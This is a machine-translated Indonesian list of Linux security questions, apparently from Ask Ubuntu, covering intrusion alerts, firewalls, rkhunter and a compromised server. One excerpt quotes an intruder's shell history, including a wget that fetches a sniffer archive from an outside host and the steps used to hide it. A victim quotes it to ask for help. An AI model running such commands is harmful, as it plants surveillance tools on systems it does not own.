Pertanyaan yang diberi tag «security»

Keamanan mencakup serangkaian luas topik termasuk Pengguna, Izin, Otentikasi, Otorisasi, Peningkatan, Firewall, Pengerasan, dll.

3
Pengaturan pemberitahuan / deteksi intrusi otomatis apa yang baik untuk penggunaan desktop rumah?
Saya sudah menggunakan Linux cukup lama sekarang dan saya selalu merasa perlu memiliki pengaturan perangkat lunak / skrip pasif yang dapat mengingatkan saya tentang segala kegiatan jaringan yang mencurigakan seperti pemindaian, upaya login yang gagal, dll dengan cepat melalui email atau dengan pemberitahuan visual / audio. Saya tahu bagaimana mencari …



2
Apakah itu ide yang buruk untuk menjalankan SELinux dan AppArmor secara bersamaan?
Kebijakan perusahaan saya mengatakan bahwa kotak Linux harus diamankan dengan SELinux (sehingga auditor keamanan dapat memeriksa kotak centang 'ya, kami sangat aman!' Untuk setiap server). Saya berharap untuk mengambil keuntungan dari keamanan AppArmor default Ubuntu yang mengagumkan. Apakah tidak bijaksana menjalankan Apparmor dan SELinux? (Jika demikian, bisakah ide buruk ini …

6
Komputer pribadi diretas: Bagaimana cara saya memblokir pengguna ini untuk masuk lagi? Bagaimana saya mengetahui bagaimana mereka masuk?
Saya 99,9% yakin bahwa sistem saya di komputer pribadi saya telah disusupi. Izinkan saya untuk memberikan alasan saya terlebih dahulu sehingga situasinya akan menjadi jelas: Garis waktu kasar dari aktivitas mencurigakan dan tindakan selanjutnya yang diambil: 4-26 23:00 Saya mengakhiri semua program dan menutup laptop saya. 4-27 12:00 Saya membuka …


5
Seberapa pentingkah kata sandi sudo?
Saya tahu bahwa kata sandi sudo melindungi komputer saya dari peretasan lokal oleh seseorang yang memiliki akses fisik ke sana ( edit: sebenarnya, tidak ). Kata sandi saya cukup kuat untuk tujuan itu, tetapi saya tahu itu tidak cukup kuat jika seseorang dapat dengan paksa memaksakannya dari jarak jauh. Can …


5
Apakah ada firewall yang sudah diinstal atau otomatis?
Apakah Ubuntu dilengkapi dengan firewall yang sudah diinstal atau otomatis? Jika tidak, apakah saya memerlukannya? Saya telah membaca beberapa artikel tentang kelebihan Linux dibandingkan sistem operasi lain tentang keamanan (tidak perlu memiliki antivirus, ...) tetapi ingin memastikan.

1
rkhunter memperingatkan tentang /etc/.java /etc/.udev /etc/.initramfs
Saya menjalankan Ubuntu 10.04.1 LTS. Saya menjalankan rkhunter untuk memeriksa rootkit. rkhunter mengeluh tentang file dan direktori tersembunyi berikut. Saya pikir file-file ini bukan masalah nyata pada sistem saya, tetapi bagaimana saya bisa memeriksa untuk melihat apakah file-file ini adalah file yang sah? [07:57:45] Checking for hidden files and directories …

2
Ditemukan SSH Backdoor di VServer. Melakukan apa?
Kemarin saya memeriksa histori perintah saya pada VServer saya. Saya menemukan beberapa garis yang mencurigakan. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " …
24 ssh  security  malware 

2
Apakah peningkatan meta-release (do-release-upgrade) aman?
Saya mencoba memahami do-release-upgradeprosesnya yaitu cara Ubuntu meminta saya untuk meningkatkan ke rilis Ubuntu musim semi atau musim gugur berikutnya. Setelah membaca sumber untuk ubuntu-release-upgradersaya menemukan file / etc / update-manager / rilis-meta di sistem saya. File ini muncul menggunakan URL HTTP untuk menunjuk ke http://changelogs.ubuntu.com/meta-release di mana berbagai rilis …


2
Bagaimana sistem tetap aman?
Saya mengerti bahwa jika ada malware yang masuk ke sistem Linux, ia akan, paling banyak, mendapatkan hak istimewa tingkat pengguna dan merusak apa pun dalam jangkauan pengguna tertentu, yaitu file milik pengguna. Tapi apa sebenarnya yang mencegah malwares mendapatkan akses tingkat root? Bisakah itu entah bagaimana memecahkan kata sandi dari …
24 security 


Dengan menggunakan situs kami, Anda mengakui telah membaca dan memahami Kebijakan Cookie dan Kebijakan Privasi kami.
Licensed under cc by-sa 3.0 with attribution required.